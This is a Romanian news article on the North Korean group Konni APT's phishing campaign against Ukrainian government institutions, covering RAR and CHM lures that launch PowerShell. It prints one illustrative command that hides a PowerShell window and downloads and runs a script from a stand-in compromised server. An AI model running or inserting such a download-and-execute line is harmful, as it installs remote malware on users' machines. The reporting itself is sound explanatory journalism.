Prima pagină » Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Gruparea nord-coreeană de spionaj cibernetic Konni APT a lansat un atac informatic îndreptat împotriva Ucrainei prin care vizează în special instituțiile guvernamentale.

Această ofensivă digitală are ca scop monitorizarea conflictului ruso-ucrainean și colectarea de date despre strategiile militare ale Kremlinului.

Cine sunt Konni APT?

Coreea de Nord

Konni APT, cunoscută și sub denumirile de Opal Sleet, Osmium, TA406 și Vedalia, este o grupare nord-coreeană de spionaj cibernetic. Activ de peste un deceniu, grupul a țintit entități guvernamentale din Coreea de Sud, Statele Unite, Rusia și, mai nou, Ucraina.

Arma principală a nord-coreenilor se numește Konni RAT (n.n. – Remote Access Trojan), cunoscut și ca UpDog. Este vorba despre un program malware (software rău intenționat) versatil, care le permite supravegherea continuă și chiar controlul total al dispozitivelor compromise.

Cea mai recentă campanie a hackerilor Konni a început în februarie 2025. Aceasta vizează colectarea de informații cu privire la „traiectoria invaziei ruse” în Ucraina, potrivit Medium.com. Departe de a se limita la interceptarea comunicațiilor, malware-ul vizează perspective strategice, politice și militare, care pot influența deciziile Phenianului în ceea ce privește sprijinul acordat Rusiei în acest conflict militar.

Phishing mascat în expertiză geopolitică

Foto: Proofpoint.com

Tactica preferată a atacatorilor presupune trimiterea de e-mailuri aparent inofensive, dar atent fabricate, care se dau drept comunicări din partea unor așa-zise grupuri de experți în politică și securitate.

Potrivit Proofpoint, o firmă de top în domeniul securității informatice pentru întreprinderi, mesajele fac referire la subiecte sensibile din actualitatea ucraineană. Este vorba despre destituiri la nivel înalt în armata ucraineană sau alegerile prezidențiale din Ucraina pentru a câștiga încrederea destinatarilor.

Odată ce victima deschide fișierul atașat, care de obicei este o arhivă RAR cu parolă denumită „Analytical Report.rar”, se execută un fișier CHM capabil să lanseze un script PowerShell. Acesta inițiază o etapă secundară a atacului informatic, descărcând alte scripturi menite să extragă informații sensibile, să stabilească accesul pe termen lung și, probabil, să pregătească terenul pentru un backdoor personalizat.

De obicei, hackerii Konni APT se bazează pe platforme gratuite precum Gmail, Outlook sau ProtonMail pentru a trimite în mod repetat mesajele periculoase, iar descărcările sunt găzduite pe servicii precum MEGA. În unele variante ale atacurilor au fost detectate și metode alternative, precum fișiere HTML care duc la arhive ZIP cu fișiere LNK și PDF. Aparent inofensive, acestea ascund componente malware capabile să execute comenzi VBScript și PowerShell, relatează Cybersecuritynews.com.

O structură tipică de comenzi ar putea semăna cu: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command „$c=’IEX (New-Object Net.WebClient).DownloadString(”http://compromised-server.com/payload.ps1”)’; iex $c”

Deși payload-ul final nu a fost identificat de cercetători în toate cazurile, toate indiciile duc spre existența unei componente de tip backdoor, concepută să faciliteze supravegherea de lungă durată și eventuale acțiuni de sabotaj digital.

Ce urmărește Konni APT

Experții în securitate cibernetică spun că scopul acestor atacuri este de a oferi regimului de la Phenian o imagine clară a angajamentului militar ucrainean, dar și a gradului de implicare al Rusiei.

Se bănuiește că aceste date ar putea influența deciziile liderilor nord-coreeni în ceea ce privește eventuale mișcări suplimentare, fie trimiterea de personal militar, fie furnizarea de armament către Moscova.

Gruparea nord-coreeană nu se află la primul atac de acest gen. Konni a desfășurat anterior operațiuni de tip spear phishing menite să compromită conturi de e-mail, folosind alerte false de securitate Microsoft pentru a colecta acreditări. De exemplu, au circulat mesaje care avertizau despre „activitate suspectă de autentificare”, redirecționând victimele către site-uri capcană precum „jetmf[.]com”.

Alte articole importante
UE împrumută modelul industrial al Chinei și riscă să alunge investitorii
Companii
UE împrumută modelul industrial al Chinei și riscă să alunge investitorii
Uniunea Europeană se află în pragul unei schimbări majore de strategie industrială, inspirată direct din modelul aplicat de China în ultimele decenii. Comisia Europeană ia în calcul introducerea unor reguli care ar obliga companiile străine să intre în parteneriate cu firme europene pentru a avea acces la piața comunitară, o abordare care riscă să tensioneze […]
DECLARAȚII EXCLUSIVE
Marian Siminică, Institutul de Studii Financiare: „Creșterea economică peste un anumit plafon e condiționată de nivelul de educație financiară”
Marian Siminică, Institutul de Studii Financiare: „Creșterea economică peste un anumit plafon e condiționată de nivelul de educație financiară”
Creșterea economică nu depinde doar de investiții, capital sau politici fiscale. Depinde, în mod direct, de nivelul de alfabetizare financiară a populației. Afirmația se bazează pe studii la nivel internațional care demonstrează o legătură extrem de puternică între nivelul de educație financiară a populației și performanța economiei, explică Prof. univ. dr. Marian Siminică, director executiv […]
Big Brother-ul fiscal devine realitate: ANAF primește acces la baza de date unică a UE, iar marile grupuri intră sub lupa transparenței totale
Companii
Big Brother-ul fiscal devine realitate: ANAF primește acces la baza de date unică a UE, iar marile grupuri intră sub lupa transparenței totale
România face un pas decisiv către cea mai amplă reformă de transparență fiscală din ultimii ani, odată cu transpunerea Directivei (UE) 2025/872, cunoscută la nivel european sub denumirea DAC9. Ministerul Finanțelor a elaborat un proiect de act normativ care schimbă fundamental modul în care marile grupuri de companii își declară profiturile și își raportează obligațiile […]
Franklin Templeton duce Fondul Proprietatea la randamente istorice: 1.340% câștig pentru acționari
Franklin Templeton duce Fondul Proprietatea la randamente istorice: 1.340% câștig pentru acționari
Strategia aplicată de Franklin Templeton în administrarea Fondului Proprietatea a generat un randament total de 1.340% pentru prețul acțiunilor și de 494% pentru valoarea activului net, de la începutul calculului performanței și până la 31 decembrie 2025. Datele sunt prezentate într-un comunicat al companiei, care evidențiază evoluția Fondului într-un context marcat de volatilitate globală și […]
Cel mai nou model ChatGPT folosește acum date din Grokipedia
Companii
Cel mai nou model ChatGPT folosește acum date din Grokipedia
ChatGPT a început să integreze informații din Grokipedia în răspunsuri, oferind utilizatorilor acces la date suplimentare și actualizate. Cel mai recent model al chatbot-ului OpenAI a început să citeze enciclopedia lui Elon Musk ca sursă pentru o gamă largă de întrebări. Această schimbare promite să îmbunătățească acuratețea și contextul informațiilor furnizate de asistentul AI. Cel […]
ANALIZĂ
Viitorul model Dacia derivat din Twingo va fi creat integral în China
Companii
Viitorul model Dacia derivat din Twingo va fi creat integral în China
Unul dintre viitoarele modele Dacia, care va fi derivat din Renault Twingo, va fi dezvoltat la centrul tehnologic Ampere din Shanghai. Ciclul de dezvoltare de la stadiul de concept până la cel de versiune de serie este de doar 16 luni. Renault își propune să devină mai competitiv în fața mărcilor chinezești care se impun […]